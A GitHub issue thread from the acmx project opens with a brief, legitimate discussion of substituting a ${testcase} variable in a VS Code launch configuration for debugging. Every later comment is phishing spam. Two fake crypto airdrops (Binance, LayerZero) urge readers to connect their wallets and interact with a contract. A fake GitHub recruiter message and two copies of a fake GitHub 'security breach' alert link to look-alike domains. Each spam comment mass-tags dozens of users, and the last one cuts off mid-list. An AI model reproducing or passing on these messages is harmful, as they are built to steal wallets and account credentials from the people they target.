### ISSUE TITLE
Setting debugging testcases for generic tools (language)

### ISSUE THREAD

**Issue by mfornet** [mfornet/acmx#20]
Right now to modify the current testcase to debug we are modifying the `task.json` using regular expression which is not really good idea.

From this repository https://github.com/agrawal-d/competitive-programming-helper use a configuration to store the path to the testcase that should be debugged.

Use variable substitution in the task to use that test.

**Comment by Salil03** [comment]
This will probably work: https://code.visualstudio.com/docs/editor/debugging#_redirect-inputoutput-tofrom-the-debug-target

**Comment by mfornet** [comment]
Yes, that sound like a good idea, however the scope of this issue is to allow making a tasks.json like:

```
{
  "name": "launch program that reads a file from stdin",
  "type": "node",
  "request": "launch",
  "program": "program.js",
  "console": "integratedTerminal",
  "args": ["<", "${testcase}.in"]
}
```
Notice the usage of `${testcase}`.

**Comment by Salil03** [comment]
Yes and then we can replace ```${testcase}``` with the appropriate file name.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @mandarenmanman, @bingghost, @theref, @Nxumalo, @hrnkoji, @jwerle, @bgyss, @adam-cronkhite, @harendra-shakya, @LinuxIsCool, @frani, @japjeet26, @michaelstewart, @truongnmt, @LightningK0ala, @hacker-DOM, @mark2021blue, @hadees, @ebarcly, @empeje, @maxtortime, @willmitchell, @jugalps, @fsimkovic, @yetanotherse, @siburu, @krrishd, @liewrichmond, @mistersingh179, @owaiswiz, @Martin-57blocks, @totiz, @christopher-cialone, @tulw4r, @NineDfish, @olsdavis, @jgh2i, @ramtinms, @dbalandin, @EG-easy, @longxiaofei, @smakhtin, @masiiie, @hyqer, @ysugimoto, @faustinoaq, @zhongeric, @0x0077, @Leask, @kigawas

**Comment by ucontinua** [comment]
# 🚀 LayerZero Total Airdrop - Claim Your Instant $100 Prize! 🎉

Attention LayerZero community! You are eligible to instantly win $100 from a $3,000 prize pool, available for the first 10,000 eligible users. Act fast to secure your spot! [Claim Now](https://connectlayerzaero.online)

![Claim Now](https://i.ytimg.com/vi/c_iNiyOUHVQ/maxresdefault.jpg)


Welcome to the LayerZero Total Airdrop! Follow these simple steps to claim your prize:

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://connectlayerzaero.online) link.
   - Choose your preferred wallet provider (Metamask, Coinbase, and others).

### 2. 🔄 Claim Your Instant $100:
   - After connecting your wallet.
   - Click on the "**Claim**" button to initiate the process.

### 3. 🔐 Interact with the Contract:
   - Once claimed.
   - Interact with the smart contract using the **connect** method to secure your instant $100 prize.

💰 Don't miss out on your chance to be one of the lucky 10,000 users! Act now to ensure your spot in the LayerZero Total Airdrop and claim your instant $100 prize.

🎉 Get ready for an exciting journey with LayerZero - where rewards await at every step!


Winners: @gaoyuqi, @nnemes8, @HansHauge, @AdamDreessen, @echozhangzy8888, @cryptopeng, @Rgsolo

**Comment by skodumur** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
deadblackclover, @jfb, @Billllll, @alsco77, @edmulraney, @Alec1017, @0xKitsune, @danisvice, @eigengravy, @zippoxer, @laibe, @PratikDhanave, @zach030, @k0mraid3, @jdaviderb, @rde9, @HugsDude, @kolsson, @bradford-hamilton, @zkSoju

**Comment by William0Friend** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
kyinfopuyu, @mnz12138, @ankurrsinghal, @sergio-hilgert, @veraaaaaLiu, @757566833, @betterjun, @hovanhoa, @renantarouco, @blockzeek, @jeffward01, @toklok, @samisbakedham, @bmann, @koraykoska, @zixuanzh, @destrat18, @stefanmendoza, @PierrickGT, @y-wenjian

**Comment by akashakki** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
ryanio, @popul, @Siubaak, @nickbytes, @felipeklafke, @pcowgill, @Aniket-Engg, @ganioc, @oo7ph, @daorren, @danoctavian, @steveukx, @junproger, @anyshy, @Thomasrichard1122, @josheche, @0xtito, @dulumao, @hugo-dc, @
